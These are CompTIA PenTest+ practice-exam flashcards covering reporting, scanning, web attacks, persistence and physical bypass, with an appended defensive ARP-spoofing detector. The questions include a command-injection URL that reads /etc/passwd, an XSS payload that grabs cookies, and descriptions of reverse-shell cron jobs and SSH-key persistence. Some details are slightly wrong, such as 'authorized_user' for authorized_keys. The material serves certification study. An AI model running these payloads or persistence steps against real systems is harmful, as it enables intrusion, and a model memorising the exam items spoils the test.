CompTIA PenTest+ Certification PT0-001: Practice Test #3 (Total Seminars) Flashcards

1
Q

Code signing helps prevent against which of the following? (Choose two.)
A.Modification of system file
B.Compromising the signing certificate of the Certificate Authority
C.Successful execution of modified code
D.Execution of malicious software

A

C.Successful execution of modified code
D.Execution of malicious software

Explanation
Correct Answer: Successful execution of modified code and execution of malicious software are correct. Code that is signed by a vendor such as Microsoft will prevent modified code or malicious code from successfully executing during runtime.

Incorrect Answers: Modification of system files and Compromising the signing certificate of the Certificate Authority are incorrect because code signing enforces integrity, not access controls. Preventing the modification of a system file is a control enforced by the operating system and preventing an attacker from compromising the signing certificate of the Certificate Authority would be handled by an access control.

2
Q

In regard to a pentest report, what is a testing narrative?
A.It shows how successful the pentest team was in conducting the assessment
B.It offers details as to the testing methodology that was executed and the outcome
C.It is required for PCI, HIPAA and FedRAMP pentests
D.It provides details for each tool used to conduct the testing

A

B.It offers details as to the testing methodology that was executed and the outcome

Explanation
Correct Answer: It offers details as to the testing methodology that was executed and the outcome is correct. The testing narrative provides chronological and causal data regarding the actions taken during testing to provide context for the findings within the scope of the methodology.

Incorrect Answers: It provides details for each tool used to conduct the testing is incorrect because each tool will not be elaborated on, especially when the tool is irrelevant to describing the technique used to exploit a target.

It shows how successful the pentest team was in conducting the assessment is incorrect because this could be a sign of gloating, and potentially add a negative tone to the report. The pentest team is successful when they execute testing activities that are within the bounds and constraints of the RoE and address all of the customer’s requirements/objectives from the assessment.

It’s required for PCI, HIPAA, and FedRAMP pentests is incorrect because PCI, HIPAA, and FedRAMP pentests have their own standards and guidelines for how a pentest report should be written, and a testing narrative may not be necessary.

3
Q

During a pentest, your team finds a vulnerability in one of the customer’s PHP applications. The following command was used to exploit the vulnerability. What type of vulnerability did your team attempt to exploit?

curl http://www.example.com/info.php?name=test;cat%20/etc/passwd

A.Command injection attack
B.SQL Injection attack
C.Remote file include
D.Local file include

A

A.Command injection attack

Explanation
Correct Answer: Command injection attack is correct. This scenario shows an example of a command injection attack, where the name web parameter allowed the pentest team to append the cat command to the URL to read the contents of the local /etc/passwd file.

Incorrect Answers: Remote file include is incorrect because the attack uses an operating system command to read the local contents of the /etc/passwd file.

Local file include is incorrect because a command was used to read the contents of a local file, not an include function from the PHP application.

SQL injection attack is incorrect because a system command, not an SQL command, was used to carry out the injection attack.

4
Q
The ___________________ dictionary is the standard for documenting publicly disclosed vulnerabilities.
A.CWE
B.CVE
C.NVD
D.BID
A

B.CVE

Explanation
Correct Answer: CVE is correct. The Common Vulnerabilities and Exposures (CVE) dictionary is the standard for documenting publicly disclosed vulnerabilities.

Incorrect Answers: CWE is incorrect because the Common Weakness Enumeration (CWE) is used to track common vulnerabilities that may not be attributed to a product or service.

NVD is incorrect because the National Vulnerability Database (NVD) is the U.S. government repository of standards-based vulnerability management data and is maintained by the National Institute of Standards and Technology (NIST).

BID is incorrect because the Bugtraq ID (BID) is a reference ID given to a unique vulnerability and is tracked by SecurityFocus (https://www.securityfocus.com), but is not the standard for reporting public vulnerabilities.

5
Q

During a web vulnerability scan, you discover the customer’s web server does not define the X-XSS-Protection header. Given the following scan results from Nikto, how could this type of vulnerability be exploited?
A.The client could be susceptible to a stored CSRF attack that could steal credentials from the user's web browser
B.The server could be exploited using a command injection attack
C.The user would be susceptible to clickjacking attacks
D.Since the header is not defined the user could potentially be susceptible to a reflected XSS attack within the web browser

A

D.Since the header is not defined the user could potentially be susceptible to a reflected XSS attack within the web browser

Explanation
Correct Answer: Since the header is not defined, the user could potentially be susceptible to a reflected XSS attack within the web browser is correct. The X-XSS-Protection response header is used by various web browsers (such as Internet Explorer, Chrome, and Safari) to prevent malicious pages from loading when a reflected cross-site scripting (XSS) attack is detected.

Incorrect Answers: The server could be exploited using a command injection attack is incorrect because this is a client-side attack, not a server-side attack.

The client could be susceptible to a stored CSRF attack that could steal credentials from the user’s web browser is incorrect because the attack vector would be through cross-site scripting (XSS), not cross-site request forgery (CSRF).

The user would be susceptible to clickjacking attacks is incorrect because there is another web server header to help control those types of attacks, such as the X-Frame-Options header.

6
Q

During web application testing you observe an HTTP 403 response from the web server when brute forcing web directories on the server. What is the likely cause of this response?
A.The web server encountered an internal error
B.You attempted to access a web page that requires authentication
C.The web page you requested does not exist
D.The web page was moved to another location

A

B.You attempted to access a web page that requires authentication

Explanation
Correct Answer: You attempted to access a web page that requires authentication is correct. An HTTP 403 message is attributed to a user not having permission to access a resource on the web server, typically due to the user failing to authenticate prior to requesting the resource.

Incorrect Answers: The web page you requested does not exist is incorrect because an HTTP 404 response is used to produce that type of message.

The web page was moved to another location is incorrect because an HTTP 302 response is used to produce that type of message.

The web server encountered an internal error is incorrect because an HTTP 500 response is used to produce that type of message.

7
Q

Given the following nmap command syntax, what is the purpose of the -T flag?

nmap -n -sSV -T4 192.168.1.0/24

A.An aggressive template used by nmap to enhance the speed of the scan, and is not concerned with accuracy
B.A timing template used by nmap to conserve bandwidth and resource utilization on the target machine
C.A template used by nmap that is followed by a number, <0-5>, to determine how many seconds to execute the scan for (that is, 0-5 seconds in total)
D.A timing template used by nmap to be sneaky when conducting port scans against a remote target machine
A

A.An aggressive template used by nmap to enhance the speed of the scan, and is not concerned with accuracy

Explanation
Correct Answer: An aggressive timing template used by nmap to enhance the speed of the scan, and is not concerned with accuracy is correct. The nmap -T flag is a timing template that simplifies the process of telling the port scanner how efficient or effective you want the scan to be. Rather than the tester determining the timing values manually with other performance options, nmap will determine them based on the template used in the scan syntax. -T <0> or <1> is used to be sneaky and evade IDS, while -T <2> is used to conserve bandwidth, -T <3> is the default scan template used when no option is specified, -T <4> is the aggressive scan template, and -T <5> is the insane template. Both <4> and <5> should only be used when network bandwidth is not limited.

Incorrect Answers: The other choices are incorrect. When the -T flag is used, Nmap will determine the timing for you. The number <0-5> passed after the -T flag will determine the template to use, and does not represent the number of seconds to execute the scan for. -T <2> is used to conserve network bandwidth, and the -T <0-1> templates are used to be sneaky and evade IDS.

8
Q
During a pentest, you are able to compromise the local administrator password for one of the Windows servers on the customer's internal domain. Which Sysinternals command can you use to execute a command shell against other Windows servers on the network to see if the customer is susceptible to password reuse?
A.AccessChk
B.BGInfo
C.AccessEnum
D.PsExec
A

D.PsExec

Explanation
Correct Answer: PsExec is correct. The PsExec utility (psexec.exe) can be used to execute processes (e.g., cmd.exe) on remote hosts over the network using your Windows credentials.

Incorrect Answers: AccessEnum is incorrect because AccessEnum is a Sysinternals tool that gives system administrators a view of the local file system and registry security settings.

BGInfo is incorrect because BGInfo is a Sysinternals tool that allows the wallpaper (background) to be changed for a local user.

AccessChk is incorrect because AccessChk is a Sysinternals tool that can be used to verify user permissions on files, directories, registry keys, global objects, and Windows services.

9
Q
Red teaming can be used to simulate an unauthorized threat actor that has unlimited time, resources, and money. Which of the following threat actors would red teaming be used to simulate, given the scenario?
A.Advanced persistent threat
B.Hacktivist
C.Script kiddie
D.Insider threat
A

A.Advanced persistent threat

Explanation
Correct Answer: Advanced persistent threat is correct. An advanced persistent threat (APT) has the time and resources available to pursue a target at any cost. A red team assessment, or red teaming, will evaluate how well an organization would fare given a scenario of a real-world attack (cyber threat). Red teaming involves stealth and blended methodologies (such as network penetration testing and social engineering) to simulate an attacker in the category of an APT.

Incorrect Answers: Hacktivist is incorrect because a hacktivist will have various levels of expertise.

Script kiddie is incorrect because Script kiddies are less skilled hackers that use public tools, exploits, and techniques.

Insider threat is incorrect because the insider threat would be an authorized user of the network, not unauthorized.

10
Q
A _______ computes all of the possible hash values for plaintext values of a certain length.
A.Brute force attack
B.Rainbow table
C.Password guessing attack
D.Dictionary attack
A

B.Rainbow table

Explanation
Correct Answer: Rainbow table is correct. A rainbow table computes all of the possible hash values for plaintext values, up to a certain length. Regardless of your computing power, these tables can become massive and require hefty storage capacity, some over 300GB in size. Each table is usually strategically designed for a specific hash requirement.

Incorrect Answers: Password guessing, Dictionary attack, and Brute force attack are incorrect because each of those answers describes a password attack rather than a precomputed table of hashes.

11
Q

Prior to the pentest, the customer provides your team with support resources and artifacts in order for your team to assist with the validation testing during an internal assessment. Among these artifacts is the SOAP project file. Which of the following best describes the purpose of this artifact?
A.Provides a machine-readable XML description of HTTP-based web services
B.Formally describes the elements comprising an XML document
C.Describes the format for receiving and sending messages
D.Elaborates on the framework used to develop the software application

A

C.Describes the format for receiving and sending messages

Explanation
Correct Answer: Describes the format for receiving and sending messages is correct. The Simple Object Access Protocol (SOAP) project file describes the format for receiving and sending messages between web-based services.

Incorrect Answers: Provides a machine-readable XML description of HTTP-based web services is incorrect because a machine-readable XML description of HTTP-based web services is found in the Web Services Description Language (WSDL).

Elaborates on the framework used to develop the software application is incorrect because the software development kit (SDK) documentation elaborates on the framework used to develop the software application.

Formally describes the elements comprising an XML document is incorrect because the Extensible Markup Language (XML) schema definition (XSD) is used to formally describe the elements comprising an XML document.

12
Q

During an internal pentest of a company’s network, you find that a substantial number of Active Directory user account passwords on the Windows domain are susceptible to brute-force login attacks, using passwords of no more than six characters in length, with little to no password complexity. Which mitigation strategy should you recommend to the customer?
A.Limit character reuse
B.Remove default user accounts on the system
C.Enforce a stronger password policy
D.Don't use passwords susceptible to dictionary attacks

A

C.Enforce a stronger password policy

Explanation
Correct Answer: Enforce a stronger password policy is correct. The customer’s network in the scenario provided lacks the ability to enforce stronger password settings, which can be controlled using both a technical policy and an administrative control policy. The administrative policy can inform users that they must use passwords that meet a certain level of complexity, and a technical policy can enforce the actions of the administrative policy using a configuration setting.

Incorrect Answers: Don’t use passwords susceptible to dictionary attacks is incorrect because telling the customer to not use passwords susceptible to dictionary attacks only highlights the weakness and is not a mitigation strategy.

Limit character reuse is incorrect because limiting character reuse during the password creation process may not alter the complexity of the password, thus not preventing passwords used on the domain from being susceptible to brute-force logins.

Remove default user accounts on the system is incorrect because removing default user accounts on the system doesn’t address the issue of weak passwords.

13
Q
During a physical pentest, your team was able to duplicate a valid employee's proximity card and would like to use it to gain access to the server room. What type of attack is described in this scenario?
A.Egress sensor bypass
B.RFID cloning
C.Lock bumping
D.SPP
A

B.RFID cloning

Explanation
Correct Answer: RFID cloning is correct. RFID cloning (badge cloning) is the process of duplicating a valid identification card used for physical entry.

Incorrect Answers: SPP is incorrect because single pin picking (SPP) is a technique used for picking the pins in pin tumbler locks.

Lock bumping is incorrect because lock bumping is a technique used for brute-forcing door locks.

Egress sensor bypass is incorrect because an egress sensor bypass is not used to clone identification cards, but rather accomplished by wedging a piece of paper between the top of the door and the door frame to trigger the motion sensor to release the magnetic lock, allowing unauthorized entry through the door.

14
Q
During a wireless pentest, your team has asked you to recover the four-way handshake for a WPA2 network. Which type of attack will you execute?
A.Wi-Fi jamming
B.Downgrade attack
C.Deauthentication attack
D.Repeating
A

C.Deauthentication attack

Explanation
Correct Answer: Deauthentication attack is correct. A deauthentication attack will force the wireless client to deauthenticate from the WPA2 wireless network, and when the client reestablishes the connection with the access point, you will be able to capture the handshake.

Incorrect Answers: Wi-Fi jamming is incorrect because Wi-Fi jamming (or RF jamming) is an illegal technique used to block radio frequencies originating from legitimate devices that rely on RF, such as equipment found in hospitals.

Downgrade attack is incorrect because downgrade attacks are used to target weak encryption protocols or ciphers for man-in-the-middle attacks.

Repeating is incorrect because repeating is used to extend a wireless network for clients outside the range of a wireless access point.

15
Q
During a physical pentest, you find that your customer is using a cipher lock to secure access to their server room. Which of the following are attacks that you can perform to bypass the locking mechanism using a forensically sound approach? (Choose two.)
A.Shim
B.Brute-force the cipher
C.Hammer
D.High-powered magnet
A

B.Brute-force the cipher
D.High-powered magnet

Explanation
Correct Answers: High-powered magnet is correct because placing a high-powered magnet on the exterior housing of the cipher lock will draw the internal flag out of position so the lock can be opened.

Brute-force the cipher is correct because the lock is susceptible to brute-force methods, but depending on the combination it could take a considerable amount of time to execute successfully.

Incorrect Answers: Shim is incorrect because the exterior housing of the cipher lock is closed off, preventing the shim from being an effective method of attack.

Hammer is incorrect because a hammer is destructive and is not a forensically sound method for opening the lock.

16
Q

In the context of a pentest report, a finding is a weakness that could be advantageous to an attacker and, when documented in the report, includes actionable items from exploitation and post-exploitation activities. Which of the following would be considered findings that should be included in the pentest report? (Choose two.)
A.The pentest team successfully bypassed the physical locking mechanism of the cipher lock using a known bypass to gain access to the organization's telecommunications closet
B.The vulnerability scanner found that the version of SSL being used does not meet industry best practices. However, this vulnerability was not found when the scan was executed from inside the trusted network
C.The pentest team conducted MiTM exploitation against assets operating on the LAN
D.A SQL Injection vulnerability provided the pentest team direct access to the production database server

A

A.The pentest team successfully bypassed the physical locking mechanism of the cipher lock using a known bypass to gain access to the organization's telecommunications closet
D.A SQL Injection vulnerability provided the pentest team direct access to the production database server

Explanation
Correct Answers: A SQL injection vulnerability provided the pentest team direct access to the production database server and the pentest team successfully bypassed the physical locking mechanism of the cipher lock using a known bypass to gain access to the organization's telecommunications closet are correct. They describe the exploitation of a vulnerability and provide supporting written evidence of a finding.

Incorrect Answers: The pentest team conducted MiTM exploitation against assets operating on the LAN is incorrect because conducting man-in-the-middle (MiTM) testing does not constitute a finding; rather, it's a testing activity or methodology that can be added to the testing narrative to describe internal testing on the local area network (LAN). However, there are valid mitigations that environments can put in place to reduce or remove the ability for an attacker to successfully perform MiTM attacks.

The vulnerability scanner found that the version of SSL being used does not meet industry best practices. However, this vulnerability was not found when the scan was executed from inside the trusted network is incorrect because a vulnerability produced from a vulnerability scanner is not always valid. Sometimes the results are false positives that require further investigation.

17
Q
Requirements management is a continuous process that enables personnel to manage the needs of an organization. A key aspect of requirements management is the _____________, which is a formal approach to assessing the pros and cons of pursuing a course of action.
A.Organizational budget
B.Impact statement
C.Impact analysis
D.Technical constraints
A

C.Impact analysis

Explanation
Correct Answer: Impact analysis is correct. The impact analysis (IA) is a key aspect of requirements management and the formal approach to assessing the pros and cons of pursuing a course of action.

Incorrect Answers: Impact statement is incorrect because the impact statement is an output from the impact analysis process, so the analysis/research needs to be conducted prior to deriving any results.

Organizational budget is incorrect because the organizational budget is used to determine if funds are available to support a particular activity, such as a pentest.

Technical constraints is incorrect because technical constraints identify technological challenges and obstacles that could negatively affect the organization.

18
Q
Organizations looking for an evaluation that tests their defense posture against real-world attacks that involve stealth and blended methodologies and that tests time to detection, time to response, and resilience against specific modeled threats would be looking for which type of assessment?
A.Goals-based
B.PCI-DSS
C.Red team
D.Compliance-based
A

C.Red team

Explanation
Correct Answer: Red team is correct. A red team assessment, or red teaming, will evaluate how well an organization would fare given a scenario of a real-world attack of skilled attackers. Red teaming involves stealth and blended methodologies (such as social engineering and network penetration testing). The goals of red teaming are to test time to detection, time to response, and resilience against specifically modeled threats using tactics not limited to a single attack scope.

Incorrect Answers: Compliance-based and PCI DSS are incorrect because those types of assessments would satisfy compliance and regulatory based assessments.

Goals-based is incorrect because goals-based assessments cover specific goals, or objectives, within a defined scope, whereas red teaming could expand using tactics that are not limited to a single attack scope.

19
Q

After gaining a foothold in customer ABC’s network, you want to set up persistence on the target Linux host you compromised root-level access on. The host is configured to allow SSH logins as root, and the root account is configured to support VNC and SSH connectivity from anywhere. Which of the following options are an alternative to creating a cronjob that sends a reverse shell to your attack box occasionally? (Choose two.)
A.Generate an SSH key and append a self-generated public key to root’s authorized_user file
B.Create a new user account with sudo privileges
C.Change the VNC password
D.All of the answer choices are correct

A

A.Generate an SSH key and append a self-generated public key to root’s authorized_user file
B.Create a new user account with sudo privileges

Explanation
Correct Answer: Create a new user account with sudo privileges is correct because creating a new user account will not interfere with existing accounts on the network, and allowing sudo access will ensure you can still obtain root-level access to the target host.

Generate an SSH key and append a self-generated public key to root’s authorized_user file is correct because root SSH logins are permitted and you are using a self-generated key (that no one else should have but you) to access the root user account, which can be removed after testing is completed.

Incorrect Answer: Change the VNC password is incorrect because changing the VNC password would prevent the authorized user from logging in, which could prevent the user from doing legitimate work and impact the productivity for the organization.

“All of the answers are correct” is incorrect because change the VNC password is incorrect.

20
Q
The rules of engagement (RoE) document MUST contain a signature from which of the following? (Choose two.)
A.Contracts department
B.Finance department
C.Organizational management
D.Service vendor
A

C.Organizational management
D.Service vendor

Explanation
Correct Answers: Service vendor is correct because the service vendor is the one who carries out the execution of the pentest.

Organizational management is correct because organizational management is responsible for working with the vendor to ensure they have what they need to be successful, and providing direct oversight of the project.

Incorrect Answers: Finance department is incorrect because the financial department is responsible for paying the purchase order for the work and verifying the service vendor’s invoice.

Contracts department is incorrect because the contracts department is involved when signing other contractual documents such as the MSA or SOW, and holds the service vendor accountable for all contractual obligations. Neither department needs to sign the RoE document.

21
Q
In a SCADA system, Modbus typically operates on which of the following ports?
A.502/tcp
B.3306/tcp
C.902/tcp
D.161/udp
A

A.502/tcp

Explanation
Correct Answer: 502/tcp is correct. Modbus is a common Supervisory Control and Data Acquisition (SCADA) protocol that operates on port 502/tcp.

Incorrect Answers: 161/udp is incorrect because port 161/udp is used for SNMP. 902/tcp is incorrect because port 902/tcp is used for VMware Server.

3306/tcp is incorrect because port 3306/tcp is used for MySQL Server.

22
Q
Open-source intelligence (OSINT) gathering is the process of data mining public sources of information about your target or target environment. Which of the following is a valid source for conducting OSINT?
A.Websites
B.All of the answer choices are correct
C.Social media
D.Public records
A

B.All of the answer choices are correct

Explanation
Correct Answers: All of the answers are correct. All of the choices can provide open-source intelligence and knowledge from public sources of information regarding your target’s environment.

Incorrect Answer: All of the other choices are incorrect as individual responses because they all are valid sources for conducting OSINT, making choice “all the answers” the best answer.

23
Q
IEEE 802.3 is the standard for which of the following options?
A.Bluetooth
B.Wired Ethernet
C.Wi-Fi
D.Zigbee
A

B.Wired Ethernet

Explanation
Correct Answer: Wired Ethernet is correct. The IEEE 802.3 standard describes all the physical characteristics of wired Ethernet, including the physical layer, data link layer, and media access control (MAC) that are used to communicate over local area networks (LANs) and wide area networks (WANs).

Incorrect Answers: Wi-Fi is incorrect because Wi-Fi standards are defined in IEEE 802.11.

Bluetooth and Zigbee are incorrect because Bluetooth and Zigbee are defined in IEEE 802.15.

24
Q
During a pentest, you were able to compromise the local `/etc/shadow` file for a Linux server. Given limited time and resources, you won't be able to use advanced methods to crack the passwords. Given these constraints, which of the following will allow you to apply a best effort to crack the password hashes? (Choose three.)
A.Password guessing
B.Dictionary attack
C.Brute force
D.Rainbow table
A

A.Password guessing
B.Dictionary attack
C.Brute force

Explanation
Correct Answers: Brute force, dictionary attack, and password guessing are correct. These answers are brute-force/guessing attacks that can be used to recover the plaintext value of a hash that has little to no password complexity, or is subject to a dictionary attack using a word list.

Incorrect Answer: Rainbow table is incorrect. It will take some time to compute a hash table, given the current constraints in the scenario.

25
Q

Disassembling and decompiling an application from its original format to look for security bugs is considered which of the following activities?
A.Debugging
B.Dynamic application security testing (DAST)
C.Source code analysis
D.Static application security testing (SAST)

A

D.Static application security testing (SAST)

Explanation
Correct Answer: Static application security testing (SAST) is correct. SAST is a debugging method used to examine source code, bytecode, and binaries for security deficiencies and does not involve executing the application.

Incorrect Answers: Dynamic application security testing (DAST) is incorrect because DAST is used when the application is running.

Debugging is incorrect because debugging is not necessarily used just for finding security bugs as it can be used by the developer for troubleshooting purposes.

Source code analysis is incorrect because source code analysis is not a process that decompiles or disassembles an application. Source code is typically the noncompiled functionality of a program.

26
Q
After obtaining root access through a local privilege escalation vulnerability on a Linux server, you decide to create a cronjob to call back to your attack host with a remote shell every hour in case the system administrator reboots the server. This technique is known as what? (Choose two.)
A.Creating a back door
B.Lateral movement
C.Pivoting
D. Maintaining persistence
A

A.Creating a back door
D.Maintaining persistence

Explanation
Correct Answers: Maintaining persistence and Creating a back door are correct. A cron job that periodically calls back to the attack host survives reboots and re-establishes access without re-exploitation, which is maintaining persistence; the callback itself is a back door into the customer's network. Any such mechanism should be permitted by the rules of engagement and recorded so it can be removed at the end of the engagement.

Incorrect Answers: Lateral movement is incorrect because lateral movement is moving from one compromised host to other hosts on the customer's network or domain, for example by using ssh or other native operating system tools with the same user's domain credentials.

Pivoting is incorrect because pivoting is the process of using a compromised host under your control to exploit trust relationships and reach targets that are not directly accessible. For example, after establishing a foothold on a host in the customer network behind an external firewall, you create an SSH tunnel through that host and stage attacks against other internal targets from it.

27
Q

Directory indexing attacks can exploit which feature of a web server?
A.Weak access controls
B.Listing files and other objects within the current directory
C.Authentication bypass

A

B.Listing files and other objects within the current directory
Explanation
Correct Answer: Listing files and other objects within the current directory is correct. Directory indexing (directory browsing) makes the web server return a listing of a directory's contents when no index page is present, much like ls in Unix or dir in Windows (on Apache, for example, the Indexes option of the Options directive controls it). With directory browsing enabled and no access controls on the directory, an attacker does not have to brute-force file and subdirectory names: they are exposed in the listing, including backups, configuration files, and other objects that were never meant to be linked.

Incorrect Answer: Authentication bypass is incorrect because authentication bypass is a different type of attack, and would only be possible if the web server or application hosted on the server was vulnerable to that type of attack.

Weak access controls is incorrect because being able to list the contents of a web directory remotely does not by itself mean the server has weak access controls. The listing saves a pentester the time of brute-forcing those object names; in some cases the customer may have enabled directory indexing deliberately, for example for a file-download area.

28
Q
\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_ is a tactical process for surveying an area for wireless access points while in a moving vehicle.
A.Stumbling
B.Wardriving
C.Enumeration
D.Scanning
A

B.Wardriving

Explanation
Correct Answer: Wardriving is correct. Wardriving is a tactical process for surveying an area for wireless access points while in a moving vehicle in order to identify wireless networks and potential targets in a certain area of interest.

Incorrect Answers: Stumbling is incorrect because stumbling is the surveillance technique of discovering SSIDs, router vendor information, signal strength, MAC addresses, channels, and so on; it does not imply doing so from a moving vehicle.

Scanning is incorrect because, in a network context, scanning actively probes targets and is more intrusive than the passive survey that wardriving performs.

Enumeration is incorrect because enumeration is the process of extracting information from a particular target, rather than passive surveillance of a target area during reconnaissance.

29
Q

Given the following example, which of these statements is correct?
A.Netcat is listening for a reverse shell from the kali host
B.Netcat was used to connect to a bind shell on dns1
C.Netcat was executed from the kali host to connect to dns1
D.Netcat was used to connect back to the kali host using a reverse shell

A

D.Netcat was used to connect back to the kali host using a reverse shell

Explanation
Correct Answer: Netcat was used to connect back to the kali host using a reverse shell is correct. In the example the netcat command runs on the target host (dns1) and initiates an outbound connection to a listener on the kali host, handing that listener a shell; this direction of connection, from the target out to the attacker, is what defines a reverse shell.

Incorrect Answers: Netcat was executed from the kali host to connect to dns1 is incorrect because the connection was initiated from the target host (dns1), not the kali host.

Netcat is listening for a reverse shell from the kali host is incorrect because it is the kali host that listens; dns1 connects to it.

Netcat was used to connect to a bind shell on dns1 is incorrect because a bind shell listens on the target and waits for the attacker to connect in; here dns1 called out to the kali host, which is a reverse shell.

30
Q
PCI DSS, HIPAA, and FISMA assessments are considered what type of testing?
A.Red team
B.Objective-based
C.Goals-based 
D.Compliance-based
A

D.Compliance-based

Explanation
Correct Answer: Compliance-based is correct. A compliance-based assessment audits an organization’s ability to follow and implement a given set of security standards within an environment. Many industry standards affect and regulate the way sensitive data may be protected, stored, and processed within an information system. The Payment Card Industry Data Security Standard (PCI DSS), Health Insurance Portability and Accountability Act (HIPAA), and Federal Information Security Management Act (FISMA) are compliance-based standards that mandate that all organizations to which they apply maintain a secure environment.

Incorrect Answers: Goals-based and objectives-based are incorrect because these interchangeable terms refer to an assessment that evaluates an organization's security by pursuing specific objectives through a simulated cyber-attack; they are not associated with compliance-based testing.

Red team is incorrect because a red team assessment, or red teaming, evaluates how well an organization would fare given a scenario of a real-world attack and is not associated with compliance-based testing.

31
Q
During a pentest, you find port 161/udp (SNMP) open on one of your target hosts that supports all three versions of the protocol. Which versions support a community string that is sent in cleartext between the manager and the agent? (Choose two.)
A.SNMPv1
B.SNMPv2
C.SNMPv3
D.None of the answer choices are correct
A

A.SNMPv1
B.SNMPv2

Explanation
Correct Answers: SNMPv1 and SNMPv2 are correct. In network environments that support legacy services, you are likely to find all three versions of SNMP. Authentication in SNMPv1 and SNMPv2 (SNMPv2c, the variant actually deployed) is nothing more than a community string, in effect a password, sent in cleartext between the manager and the agent; anyone who can sniff the traffic, or guess a default such as public or private, can read and possibly write the device's configuration.

Incorrect Answers: SNMPv3 and "None of the answer choices are correct" are incorrect. SNMPv3 replaces community strings with user-based authentication (HMAC with MD5 or SHA) and optional privacy (encryption of the payload), so credentials are not forwarded in cleartext. Best practice is SNMPv3 at the authPriv security level with strong passphrases and the authentication protocol set to SHA.

32
Q
During a web pentest, your team discovers that they can inject arbitrary code in an HTTP GET request using one of the URL parameters passed back to the target web server. Looking at the following example request they executed, what type of attack did they perform? www.example.com/info.php?id=<script>alert(document.cookie)</script>
A.Stored XSS
B.SQLi
C.DOM-based XSS
D.Reflected XSS
A

D.Reflected XSS

Explanation
Correct Answer: Reflected XSS is correct. The example shows a reflected cross-site scripting (XSS) attack: the script is supplied in a single request (the id parameter), echoed back unescaped in the server's response, and executed by the browser of whoever follows the crafted link.

Incorrect Answers: DOM-based XSS is incorrect because in a Document Object Model (DOM)-based attack the vulnerable code is client-side JavaScript that writes attacker-controlled data (for example from the URL fragment) into the page at runtime. Unlike reflected XSS, the payload is processed entirely in the user's browser and may never be sent to the server at all.

Stored XSS is incorrect because stored XSS occurs when the payload is persisted server-side, such as in a database record, comment, or log that is later rendered, and then executes in the browser of every user who views that content. This type of attack can be used to steal session tokens from authorized users of the application.

SQLi is incorrect because SQL injection relies on SQL syntax reaching a database query, not JavaScript delivered in script tags.

33
Q
Mitigation strategies could be provided for which of the following categories?
A.Processes
B.Technology
C.All of the answer choices are correct
D.People
A

C.All of the answer choices are correct

Explanation
Correct Answers: All of the answers are correct. People, technology, and processes could be the cause of a vulnerability within the organization or on the organization’s network. However, these elements can also carry, identify, or implement the solution to help remediate the problem.

Incorrect Answers: The other answers are incorrect by themselves, as all of the choices are correct.

34
Q
Out of the following cryptographic protocols, which one offers the BEST security when posting sensitive data to a web server over the Internet?
A.TLSv1.2
B.SSLv3
C.TLSv1.0
D.SSLv2
A

A.TLSv1.2

Explanation
Correct Answer: TLSv1.2 is correct. Of the protocols listed, Transport Layer Security (TLS) version 1.2 is the most recent and supersedes the others (TLS 1.3, published in 2018, is not among the options and would be preferable where supported).

Incorrect Answers: TLSv1.0 is incorrect because it has known weaknesses (such as the BEAST attack against its CBC cipher suites) and, as the weakest TLS version a server may still offer, is the target of protocol downgrade attacks that expose the client to man-in-the-middle (MiTM) interception.

SSLv3 and SSLv2 are incorrect because both Secure Sockets Layer (SSL) versions are broken and formally deprecated: SSLv3 is vulnerable to the POODLE attack and was deprecated by RFC 7568, and SSLv2 was prohibited by RFC 6176. Both are superseded by TLSv1.2.

35
Q

ARP poisoning can assist with accomplishing which of the following tasks on a local area network (LAN)? (Choose two.)
A.DNS cache poisoning
B.Redirecting a target to a malicious website
C.Impersonating another host on the network
D.Waterholing

A

B.Redirecting a target to a malicious website
C.Impersonating another host on the network

Explanation
Correct Answer: Redirecting a target to a malicious website and Impersonating another host on the network are correct. ARP (Address Resolution Protocol) has no authentication, so an attacker on the LAN can send forged ARP replies that bind another host's IP address (typically the default gateway's) to the attacker's MAC address. Victims update their ARP caches and send traffic for that IP to the attacker, who is now impersonating the host and can forward, inspect, or modify the traffic in transit (man-in-the-middle), for example rewriting DNS answers or HTTP responses to redirect the target to a malicious website. Tools such as Ettercap automate this.

Incorrect Answers: Waterholing is incorrect because waterholing is a social engineering method that targets a specific group by placing malware on a website the targets frequent.

DNS cache poisoning is incorrect because it targets a DNS resolver, inserting a forged record into its cache so that a name resolves to a malicious address; the resolver may be external to the LAN, and the attack does not depend on ARP at all. DNS cache poisoning may be a viable option when local network access to perform ARP spoofing is unavailable.
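The defensive counterpart of the attack described above is to watch ARP replies for the two signatures that poisoning leaves: an IP address whose MAC binding changes, and one MAC address answering for more than one IP. The following detector is an added example, not code from the original practice test; the ARP replies it runs over are constructed sample values, with the gateway 192.0.2.1, the victim 192.0.2.50, and the attacker's MAC de:ad:be:ef:00:99 all assumed for illustration.

```python
from collections import defaultdict
from typing import Dict, List

# Constructed sample of ARP replies as a passive sniffer on the LAN might record
# them (example values, not traffic from the original page). At t=5.0 a new MAC
# starts answering for the gateway 192.0.2.1, and at t=5.1 the same MAC also
# answers for the victim 192.0.2.50, which is the classic two-sided poisoning.
ARP_REPLIES = [
    {"t": 0.0, "sender_ip": "192.0.2.1",  "sender_mac": "00:11:22:33:44:01"},
    {"t": 0.5, "sender_ip": "192.0.2.50", "sender_mac": "00:11:22:33:44:50"},
    {"t": 5.0, "sender_ip": "192.0.2.1",  "sender_mac": "DE:AD:BE:EF:00:99"},
    {"t": 5.1, "sender_ip": "192.0.2.50", "sender_mac": "de:ad:be:ef:00:99"},
    {"t": 6.0, "sender_ip": "192.0.2.1",  "sender_mac": "de:ad:be:ef:00:99"},
]


def detect_arp_poisoning(replies: List[Dict]) -> List[str]:
    """Return one alert per suspicious event: an IP whose MAC binding changes,
    or a MAC that starts claiming more than one IP address."""
    alerts: List[str] = []
    ip_to_mac: Dict[str, str] = {}          # last MAC seen answering for each IP
    mac_to_ips: Dict[str, set] = defaultdict(set)  # every IP each MAC has claimed
    for r in replies:
        ip, mac = r["sender_ip"], r["sender_mac"].lower()  # normalise MAC case
        prev = ip_to_mac.get(ip)
        if prev is not None and prev != mac:
            alerts.append(f"t={r['t']:.1f}: {ip} moved from {prev} to {mac}")
        ip_to_mac[ip] = mac
        if ip not in mac_to_ips[mac]:
            mac_to_ips[mac].add(ip)
            if len(mac_to_ips[mac]) > 1:
                alerts.append(f"t={r['t']:.1f}: {mac} now claims {sorted(mac_to_ips[mac])}")
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_poisoning(ARP_REPLIES):
        print(alert)
```

Legitimate events produce the same signal (a replaced NIC, DHCP lease churn, VRRP/HSRP gateway failover), so in production the detector should be tuned against a baseline of known bindings. Preventive controls are static ARP entries on critical hosts and Dynamic ARP Inspection on managed switches.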

36
